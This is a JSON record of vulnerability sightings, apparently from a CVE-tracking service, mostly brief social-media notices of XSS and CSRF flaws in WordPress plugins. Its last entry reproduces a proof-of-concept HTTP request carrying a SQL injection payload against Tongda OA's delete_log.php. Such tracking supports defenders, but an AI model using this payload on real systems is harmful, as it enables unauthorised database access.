{"vulnerability": "cve-2023-4166", "sightings": [{"uuid": "8a086ce4-6e9d-40af-b1ee-db9ff044bb82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41664", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113647463877853767", "content": "", "creation_timestamp": "2024-12-13T20:44:39.327107Z"}, {"uuid": "d5447c34-0559-4d8b-96c2-bfbdf132aa2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41666", "type": "seen", "source": "https://t.me/cibsecurity/71309", "content": "\u203c CVE-2023-41666 \u203c\n\nAuth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Stockdio Stock Quotes List plugin <=\u00c2\u00a02.9.9 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:38:00.000000Z"}, {"uuid": "7b7e4480-d05b-482b-b452-1b0c4a629f14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41669", "type": "seen", "source": "https://t.me/cibsecurity/71856", "content": "\u203c CVE-2023-41669 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in DAEXT Live News plugin <=\u00c2\u00a01.06 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-09T22:16:09.000000Z"}, {"uuid": "dcb891b3-ebe1-4bb3-81b8-f5b4a54edb93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41668", "type": "seen", "source": "https://t.me/cibsecurity/71853", "content": "\u203c CVE-2023-41668 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Leadster plugin <=\u00c2\u00a01.1.2 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-09T22:16:06.000000Z"}, {"uuid": "e7a2a652-0403-42c0-b5d8-ae81fe1a7238", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41667", "type": "seen", "source": "https://t.me/cibsecurity/71850", "content": "\u203c CVE-2023-41667 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Ulf Benjaminsson WP-dTree plugin <=\u00c2\u00a04.4.5 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-09T22:16:02.000000Z"}, {"uuid": "1eb49c8e-0adb-4878-9101-b926c4b1ff2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41660", "type": "seen", "source": "https://t.me/cibsecurity/71847", "content": "\u203c CVE-2023-41660 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in WPSynchro WP Synchro plugin <=\u00c2\u00a01.9.1 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-09T18:16:01.000000Z"}, {"uuid": "2fd39670-3ec0-41ab-904d-d02a277718bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41661", "type": "seen", "source": "https://t.me/cibsecurity/71300", "content": "\u203c CVE-2023-41661 \u203c\n\nAuth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in PressPage Entertainment Inc. Smarty for WordPress plugin <=\u00c2\u00a03.1.35 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:50.000000Z"}, {"uuid": "62463a04-8ef3-4594-9dc2-0aa8383440d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41663", "type": "seen", "source": "https://t.me/cibsecurity/71298", "content": "\u203c CVE-2023-41663 \u203c\n\nUnauth. Reflected Cross-Site Scripting (XSS) vulnerability in Giovambattista Fazioli WP Bannerize Pro plugin <=\u00c2\u00a01.6.9 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:48.000000Z"}, {"uuid": "38556059-a37f-464b-bb62-9da0d706c7b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41662", "type": "seen", "source": "https://t.me/cibsecurity/71295", "content": "\u203c CVE-2023-41662 \u203c\n\nUnauth. Reflected Cross-Site Scripting (XSS) vulnerability in Ulf Benjaminsson WP-dTree plugin <=\u00c2\u00a04.4.5 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:45.000000Z"}, {"uuid": "7efbc9fa-f934-4f37-a138-57f83af8023c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4166", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/857", "content": "\u901a\u8fbeOA sql\u6ce8\u5165\u6f0f\u6d1e CVE-2023-4166 POC\n\nGET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1\nHost: 127.0.0.1:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n2023  \ud83c\udde8\ud83c\uddf3\u62a4\u7f51poc \n#poc", "creation_timestamp": "2023-10-10T15:06:55.000000Z"}]}